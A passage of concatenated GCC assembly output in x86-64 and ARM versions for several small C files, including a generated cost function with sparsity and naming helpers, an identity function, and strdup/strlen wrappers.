long_cost_y_0_fun_free_mem, .-long_cost_y_0_fun_free_mem .globl long_cost_y_0_fun_checkout .type long_cost_y_0_fun_checkout, @function long_cost_y_0_fun_checkout: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov eax, 0 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size long_cost_y_0_fun_checkout, .-long_cost_y_0_fun_checkout .globl long_cost_y_0_fun_release .type long_cost_y_0_fun_release, @function long_cost_y_0_fun_release: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -4[rbp], edi nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size long_cost_y_0_fun_release, .-long_cost_y_0_fun_release .globl long_cost_y_0_fun_incref .type long_cost_y_0_fun_incref, @function long_cost_y_0_fun_incref: .LFB8: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE8: .size long_cost_y_0_fun_incref, .-long_cost_y_0_fun_incref .globl long_cost_y_0_fun_decref .type long_cost_y_0_fun_decref, @function long_cost_y_0_fun_decref: .LFB9: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE9: .size long_cost_y_0_fun_decref, .-long_cost_y_0_fun_decref .globl long_cost_y_0_fun_n_in .type long_cost_y_0_fun_n_in, @function long_cost_y_0_fun_n_in: .LFB10: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov eax, 3 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE10: .size long_cost_y_0_fun_n_in, .-long_cost_y_0_fun_n_in .globl long_cost_y_0_fun_n_out .type long_cost_y_0_fun_n_out, @function long_cost_y_0_fun_n_out: .LFB11: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov eax, 1 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE11: .size long_cost_y_0_fun_n_out, .-long_cost_y_0_fun_n_out .globl long_cost_y_0_fun_default_in .type long_cost_y_0_fun_default_in, @function long_cost_y_0_fun_default_in: .LFB12: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -4[rbp], edi pxor xmm0, xmm0 movq rax, xmm0 movq xmm0, rax pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE12: .size long_cost_y_0_fun_default_in, .-long_cost_y_0_fun_default_in .section .rodata .LC5: .string "i0" .LC6: .string "i1" .LC7: .string "i2" .text .globl long_cost_y_0_fun_name_in .type long_cost_y_0_fun_name_in, @function long_cost_y_0_fun_name_in: .LFB13: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -4[rbp], edi cmp DWORD PTR -4[rbp], 2 je .L39 cmp DWORD PTR -4[rbp], 2 jg .L40 cmp DWORD PTR -4[rbp], 0 je .L41 cmp DWORD PTR -4[rbp], 1 je .L42 jmp .L40 .L41: lea rax, .LC5[rip] jmp .L43 .L42: lea rax, .LC6[rip] jmp .L43 .L39: lea rax, .LC7[rip] jmp .L43 .L40: mov eax, 0 .L43: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE13: .size long_cost_y_0_fun_name_in, .-long_cost_y_0_fun_name_in .section .rodata .LC8: .string "o0" .text .globl long_cost_y_0_fun_name_out .type long_cost_y_0_fun_name_out, @function long_cost_y_0_fun_name_out: .LFB14: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -4[rbp], edi cmp DWORD PTR -4[rbp], 0 jne .L45 lea rax, .LC8[rip] jmp .L46 .L45: mov eax, 0 .L46: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE14: .size long_cost_y_0_fun_name_out, .-long_cost_y_0_fun_name_out .globl long_cost_y_0_fun_sparsity_in .type long_cost_y_0_fun_sparsity_in, @function long_cost_y_0_fun_sparsity_in: .LFB15: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -4[rbp], edi cmp DWORD PTR -4[rbp], 2 je .L48 cmp DWORD PTR -4[rbp], 2 jg .L49 cmp DWORD PTR -4[rbp], 0 je .L50 cmp DWORD PTR -4[rbp], 1 je .L51 jmp .L49 .L50: lea rax, long_cost_y_0_fun_s0[rip] jmp .L52 .L51: lea rax, long_cost_y_0_fun_s1[rip] jmp .L52 .L48: lea rax, long_cost_y_0_fun_s0[rip] jmp .L52 .L49: mov eax, 0 .L52: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE15: .size long_cost_y_0_fun_sparsity_in, .-long_cost_y_0_fun_sparsity_in .globl long_cost_y_0_fun_sparsity_out .type long_cost_y_0_fun_sparsity_out, @function long_cost_y_0_fun_sparsity_out: .LFB16: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -4[rbp], edi cmp DWORD PTR -4[rbp], 0 jne .L54 lea rax, long_cost_y_0_fun_s2[rip] jmp .L55 .L54: mov eax, 0 .L55: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE16: .size long_cost_y_0_fun_sparsity_out, .-long_cost_y_0_fun_sparsity_out .globl long_cost_y_0_fun_work .type long_cost_y_0_fun_work, @function long_cost_y_0_fun_work: .LFB17: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -8[rbp], rdi mov QWORD PTR -16[rbp], rsi mov QWORD PTR -24[rbp], rdx mov QWORD PTR -32[rbp], rcx cmp QWORD PTR -8[rbp], 0 je .L57 mov rax, QWORD PTR -8[rbp] mov DWORD PTR [rax], 3 .L57: cmp QWORD PTR -16[rbp], 0 je .L58 mov rax, QWORD PTR -16[rbp] mov DWORD PTR [rax], 1 .L58: cmp QWORD PTR -24[rbp], 0 je .L59 mov rax, QWORD PTR -24[rbp] mov DWORD PTR [rax], 0 .L59: cmp QWORD PTR -32[rbp], 0 je .L60 mov rax, QWORD PTR -32[rbp] mov DWORD PTR [rax], 0 .L60: mov eax, 0 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE17: .size long_cost_y_0_fun_work, .-long_cost_y_0_fun_work .section .rodata .align 8 .LC1: .long -858993459 .long 1074580684 .align 8 .LC2: .long 1374389535 .long 1077124792 .align 8 .LC3: .long 0 .long 1074790400 .align 8 .LC4: .long 0 .long 1076101120 .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "474132.c" .text .global __aeabi_dmul .align 2 .global long_cost_y_0_fun_sq .syntax unified .arm .fpu softvfp .type long_cost_y_0_fun_sq, %function long_cost_y_0_fun_sq: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-12] str r1, [fp, #-8] sub r3, fp, #12 ldmia r3, {r2-r3} sub r1, fp, #12 ldmia r1, {r0-r1} bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size long_cost_y_0_fun_sq, .-long_cost_y_0_fun_sq .section .rodata .align 2 .type long_cost_y_0_fun_s0, %object .size long_cost_y_0_fun_s0, 28 long_cost_y_0_fun_s0: .word 3 .word 1 .word 0 .word 3 .word 0 .word 1 .word 2 .align 2 .type long_cost_y_0_fun_s1, %object .size long_cost_y_0_fun_s1, 20 long_cost_y_0_fun_s1: .word 1 .word 1 .word 0 .word 1 .word 0 .align 2 .type long_cost_y_0_fun_s2, %object .size long_cost_y_0_fun_s2, 36 long_cost_y_0_fun_s2: .word 5 .word 1 .word 0 .word 5 .word 0 .word 1 .word 2 .word 3 .word 4 .global __aeabi_dsub .global __aeabi_ddiv .global __aeabi_dadd .text .align 2 .syntax unified .arm .fpu softvfp .type long_cost_y_0_fun_f0, %function long_cost_y_0_fun_f0: @ args = 4, pretend = 0, frame = 64 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #64 str r0, [fp, #-56] str r1, [fp, #-60] str r2, [fp, #-64] str r3, [fp, #-68] ldr r3, [fp, #-56] add r3, r3, #8 ldr r3, [r3] cmp r3, #0 beq .L4 ldr r3, [fp, #-56] add r3, r3, #8 ldr r3, [r3] add r3, r3, #16 ldmia r3, {r2-r3} b .L5 .L4: mov r2, #0 mov r3, #0 .L5: str r2, [fp, #-52] str r3, [fp, #-48] ldr r3, [fp, #-56] ldr r3, [r3] cmp r3, #0 beq .L6 ldr r3, [fp, #-56] ldr r3, [r3] ldmia r3, {r2-r3} b .L7 .L6: mov r2, #0 mov r3, #0 .L7: str r2, [fp, #-44] str r3, [fp, #-40] sub r3, fp, #44 ldmia r3, {r2-r3} sub r1, fp, #52 ldmia r1, {r0-r1} bl __aeabi_dsub mov r2, r0 mov r3, r1 str r2, [fp, #-52] str r3, [fp, #-48] ldr r2, .L20 ldr r3, .L20+4 str r2, [fp, #-36] str r3, [fp, #-32] ldr r3, [fp, #-56] ldr r3, [r3] cmp r3, #0 beq .L8 ldr r3, [fp, #-56] ldr r3, [r3] add r3, r3, #8 ldmia r3, {r2-r3} b .L9 .L8: mov r2, #0 mov r3, #0 .L9: str r2, [fp, #-28] str r3, [fp, #-24] sub r3, fp, #28 ldmia r3, {r2-r3} sub r1, fp, #36 ldmia r1, {r0-r1} bl __aeabi_dmul mov r2, r0 mov r3, r1 str r2, [fp, #-36] str r3, [fp, #-32] sub r1, fp, #28 ldmia r1, {r0-r1} bl long_cost_y_0_fun_sq str r0, [fp, #-20] str r1, [fp, #-16] ldr r2, .L20+8 ldr r3, .L20+12 str r2, [fp, #-12] str r3, [fp, #-8] sub r3, fp, #12 ldmia r3, {r2-r3} sub r1, fp, #20 ldmia r1, {r0-r1} bl __aeabi_ddiv mov r2, r0 mov r3, r1 str r2, [fp, #-20] str r3, [fp, #-16] sub r3, fp, #20 ldmia r3, {r2-r3} sub r1, fp, #36 ldmia r1, {r0-r1} bl __aeabi_dadd mov r2, r0 mov r3, r1 str r2, [fp, #-36] str r3, [fp, #-32] mov r2, #0 ldr r3, .L20+16 str r2, [fp, #-20] str r3, [fp, #-16] sub r3, fp, #20 ldmia r3, {r2-r3} sub r1, fp, #36 ldmia r1, {r0-r1} bl __aeabi_dadd mov r2, r0 mov r3, r1 str r2, [fp, #-36] str r3, [fp, #-32] sub r3, fp, #36 ldmia r3, {r2-r3} sub r1, fp, #52 ldmia r1, {r0-r1} bl __aeabi_dsub mov r2, r0 mov r3, r1 str r2, [fp, #-52] str r3, [fp, #-48] mov r2, #0 ldr r3, .L20+20 str r2, [fp, #-36] str r3, [fp, #-32] sub r3, fp, #28 ldmia r3, {r2-r3} sub r1, fp, #36 ldmia r1, {r0-r1} bl __aeabi_dadd mov r2, r0 mov r3, r1 str r2, [fp, #-36] str r3, [fp, #-32] sub r3, fp, #36 ldmia r3, {r2-r3} sub r1, fp, #52 ldmia r1, {r0-r1} bl __aeabi_ddiv mov r2, r0 mov r3, r1 str r2, [fp, #-52] str r3, [fp, #-48] ldr r3, [fp, #-60] ldr r3, [r3] cmp r3, #0 beq .L10 ldr r3, [fp, #-60] ldr r1, [r3] sub r3, fp, #52 ldmia r3, {r2-r3} stm r1, {r2-r3} .L10: ldr r3, [fp, #-60] ldr r3, [r3] cmp r3, #0 beq .L11 ldr r3, [fp, #-60] ldr r3, [r3] add r1, r3, #8 sub r3, fp, #44 ldmia r3, {r2-r3} stm r1, {r2-r3} .L11: ldr r3, [fp, #-60] ldr r3, [r3] cmp r3, #0 beq .L12 ldr r3, [fp, #-60] ldr r3, [r3] add r1, r3, #16 sub r3, fp, #28 ldmia r3, {r2-r3} stm r1, {r2-r3} .L12: ldr r3, [fp, #-56] ldr r3, [r3] cmp r3, #0 beq .L13 ldr r3, [fp, #-56] ldr r3, [r3] add r3, r3, #16 ldmia r3, {r2-r3} b .L14 .L13: mov r2, #0 mov r3, #0 .L14: str r2, [fp, #-28] str r3, [fp, #-24] ldr r3, [fp, #-60] ldr r3, [r3] cmp r3, #0 beq .L15 ldr r3, [fp, #-60] ldr r3, [r3] add r1, r3, #24 sub r3, fp, #28 ldmia r3, {r2-r3} stm r1, {r2-r3} .L15: ldr r3, [fp, #-56] add r3, r3, #4 ldr r3, [r3] cmp r3, #0 beq .L16 ldr r3, [fp, #-56] add r3, r3, #4 ldr r3, [r3] ldmia r3, {r2-r3} b .L17 .L16: mov r2, #0 mov r3, #0 .L17: str r2, [fp, #-28] str r3, [fp, #-24] ldr r3, [fp, #-60] ldr r3, [r3] cmp r3, #0 beq .L18 ldr r3, [fp, #-60] ldr r3, [r3] add r1, r3, #32 sub r3, fp, #28 ldmia r3, {r2-r3} stm r1, {r2-r3} .L18: mov r3, #0 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L21: .align 2 .L20: .word -858993459 .word 1074580684 .word 1374389535 .word 1077124792 .word 1074790400 .word 1076101120 .size long_cost_y_0_fun_f0, .-long_cost_y_0_fun_f0 .align 2 .global long_cost_y_0_fun .syntax unified .arm .fpu softvfp .type long_cost_y_0_fun, %function long_cost_y_0_fun: @ args = 4, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #24 str r0, [fp, #-8] str r1, [fp, #-12] str r2, [fp, #-16] str r3, [fp, #-20] ldr r3, [fp, #4] str r3, [sp] ldr r3, [fp, #-20] ldr r2, [fp, #-16] ldr r1, [fp, #-12] ldr r0, [fp, #-8] bl long_cost_y_0_fun_f0 mov r3, r0 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size long_cost_y_0_fun, .-long_cost_y_0_fun .align 2 .global long_cost_y_0_fun_alloc_mem .syntax unified .arm .fpu softvfp .type long_cost_y_0_fun_alloc_mem, %function long_cost_y_0_fun_alloc_mem: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 mov r3, #0 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size long_cost_y_0_fun_alloc_mem, .-long_cost_y_0_fun_alloc_mem .align 2 .global long_cost_y_0_fun_init_mem .syntax unified .arm .fpu softvfp .type long_cost_y_0_fun_init_mem, %function long_cost_y_0_fun_init_mem: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] mov r3, #0 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size long_cost_y_0_fun_init_mem, .-long_cost_y_0_fun_init_mem .align 2 .global long_cost_y_0_fun_free_mem .syntax unified .arm .fpu softvfp .type long_cost_y_0_fun_free_mem, %function long_cost_y_0_fun_free_mem: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] nop add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size long_cost_y_0_fun_free_mem, .-long_cost_y_0_fun_free_mem .align 2 .global long_cost_y_0_fun_checkout .syntax unified .arm .fpu softvfp .type long_cost_y_0_fun_checkout, %function long_cost_y_0_fun_checkout: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 mov r3, #0 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size long_cost_y_0_fun_checkout, .-long_cost_y_0_fun_checkout .align 2 .global long_cost_y_0_fun_release .syntax unified .arm .fpu softvfp .type long_cost_y_0_fun_release, %function long_cost_y_0_fun_release: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] nop add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size long_cost_y_0_fun_release, .-long_cost_y_0_fun_release .align 2 .global long_cost_y_0_fun_incref .syntax unified .arm .fpu softvfp .type long_cost_y_0_fun_incref, %function long_cost_y_0_fun_incref: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 nop add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size long_cost_y_0_fun_incref, .-long_cost_y_0_fun_incref .align 2 .global long_cost_y_0_fun_decref .syntax unified .arm .fpu softvfp .type long_cost_y_0_fun_decref, %function long_cost_y_0_fun_decref: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 nop add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size long_cost_y_0_fun_decref, .-long_cost_y_0_fun_decref .align 2 .global long_cost_y_0_fun_n_in .syntax unified .arm .fpu softvfp .type long_cost_y_0_fun_n_in, %function long_cost_y_0_fun_n_in: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 mov r3, #3 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size long_cost_y_0_fun_n_in, .-long_cost_y_0_fun_n_in .align 2 .global long_cost_y_0_fun_n_out .syntax unified .arm .fpu softvfp .type long_cost_y_0_fun_n_out, %function long_cost_y_0_fun_n_out: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 mov r3, #1 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size long_cost_y_0_fun_n_out, .-long_cost_y_0_fun_n_out .align 2 .global long_cost_y_0_fun_default_in .syntax unified .arm .fpu softvfp .type long_cost_y_0_fun_default_in, %function long_cost_y_0_fun_default_in: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] mov r2, #0 mov r3, #0 mov r0, r2 mov r1, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size long_cost_y_0_fun_default_in, .-long_cost_y_0_fun_default_in .section .rodata .align 2 .LC0: .ascii "i0\000" .align 2 .LC1: .ascii "i1\000" .align 2 .LC2: .ascii "i2\000" .text .align 2 .global long_cost_y_0_fun_name_in .syntax unified .arm .fpu softvfp .type long_cost_y_0_fun_name_in, %function long_cost_y_0_fun_name_in: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] ldr r3, [fp, #-8] cmp r3, #2 beq .L41 ldr r3, [fp, #-8] cmp r3, #2 bgt .L42 ldr r3, [fp, #-8] cmp r3, #0 beq .L43 ldr r3, [fp, #-8] cmp r3, #1 beq .L44 b .L42 .L43: ldr r3, .L46 b .L45 .L44: ldr r3, .L46+4 b .L45 .L41: ldr r3, .L46+8 b .L45 .L42: mov r3, #0 .L45: mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L47: .align 2 .L46: .word .LC0 .word .LC1 .word .LC2 .size long_cost_y_0_fun_name_in, .-long_cost_y_0_fun_name_in .section .rodata .align 2 .LC3: .ascii "o0\000" .text .align 2 .global long_cost_y_0_fun_name_out .syntax unified .arm .fpu softvfp .type long_cost_y_0_fun_name_out, %function long_cost_y_0_fun_name_out: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] ldr r3, [fp, #-8] cmp r3, #0 bne .L49 ldr r3, .L51 b .L50 .L49: mov r3, #0 .L50: mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L52: .align 2 .L51: .word .LC3 .size long_cost_y_0_fun_name_out, .-long_cost_y_0_fun_name_out .align 2 .global long_cost_y_0_fun_sparsity_in .syntax unified .arm .fpu softvfp .type long_cost_y_0_fun_sparsity_in, %function long_cost_y_0_fun_sparsity_in: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] ldr r3, [fp, #-8] cmp r3, #2 beq .L54 ldr r3, [fp, #-8] cmp r3, #2 bgt .L55 ldr r3, [fp, #-8] cmp r3, #0 beq .L56 ldr r3, [fp, #-8] cmp r3, #1 beq .L57 b .L55 .L56: ldr r3, .L59 b .L58 .L57: ldr r3, .L59+4 b .L58 .L54: ldr r3, .L59 b .L58 .L55: mov r3, #0 .L58: mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L60: .align 2 .L59: .word long_cost_y_0_fun_s0 .word long_cost_y_0_fun_s1 .size long_cost_y_0_fun_sparsity_in, .-long_cost_y_0_fun_sparsity_in .align 2 .global long_cost_y_0_fun_sparsity_out .syntax unified .arm .fpu softvfp .type long_cost_y_0_fun_sparsity_out, %function long_cost_y_0_fun_sparsity_out: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] ldr r3, [fp, #-8] cmp r3, #0 bne .L62 ldr r3, .L64 b .L63 .L62: mov r3, #0 .L63: mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L65: .align 2 .L64: .word long_cost_y_0_fun_s2 .size long_cost_y_0_fun_sparsity_out, .-long_cost_y_0_fun_sparsity_out .align 2 .global long_cost_y_0_fun_work .syntax unified .arm .fpu softvfp .type long_cost_y_0_fun_work, %function long_cost_y_0_fun_work: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #20 str r0, [fp, #-8] str r1, [fp, #-12] str r2, [fp, #-16] str r3, [fp, #-20] ldr r3, [fp, #-8] cmp r3, #0 beq .L67 ldr r3, [fp, #-8] mov r2, #3 str r2, [r3] .L67: ldr r3, [fp, #-12] cmp r3, #0 beq .L68 ldr r3, [fp, #-12] mov r2, #1 str r2, [r3] .L68: ldr r3, [fp, #-16] cmp r3, #0 beq .L69 ldr r3, [fp, #-16] mov r2, #0 str r2, [r3] .L69: ldr r3, [fp, #-20] cmp r3, #0 beq .L70 ldr r3, [fp, #-20] mov r2, #0 str r2, [r3] .L70: mov r3, #0 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size long_cost_y_0_fun_work, .-long_cost_y_0_fun_work .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "755957.c" .intel_syntax noprefix .text .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "755957.c" .text .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "559991.c" .intel_syntax noprefix .text .globl f0 .type f0, @function f0: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -8[rbp], rdi mov rax, QWORD PTR -8[rbp] pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size f0, .-f0 .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "559991.c" .text .align 2 .global f0 .syntax unified .arm .fpu softvfp .type f0, %function f0: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] ldr r3, [fp, #-8] mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size f0, .-f0 .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "562140.c" .intel_syntax noprefix .text .globl strings_dup .type strings_dup, @function strings_dup: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov QWORD PTR -8[rbp], rdi cmp QWORD PTR -8[rbp], 0 jne .L2 mov eax, 0 jmp .L3 .L2: mov rax, QWORD PTR -8[rbp] mov rdi, rax call strdup@PLT .L3: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size strings_dup, .-strings_dup .globl strings_len .type strings_len, @function strings_len: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov QWORD PTR -8[rbp], rdi cmp QWORD PTR -8[rbp], 0 jne .L5 mov eax, 0 jmp .L6 .L5: mov rax, QWORD PTR -8[rbp] mov rdi, rax call strlen@PLT .L6: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size strings_len, .-strings_len .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "562140.c" .text .align 2 .global strings_dup .syntax unified .arm .fpu softvfp .type strings_dup, %function strings_dup: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] ldr r3, [fp, #-8] cmp r3, #0 bne .L2 mov r3, #0 b .L3 .L2: ldr r0, [fp, #-8] bl strdup mov r3, r0 .L3: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size strings_dup, .-strings_dup .align 2 .global strings_len .syntax unified .arm .fpu softvfp .type strings_len, %function strings_len: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] ldr r3, [fp, #-8] cmp r3, #0 bne .L5 mov r3, #0 b .L6 .L5: ldr r0, [fp, #-8] bl strlen mov r3, r0 .L6: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size strings_len, .-strings_len .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
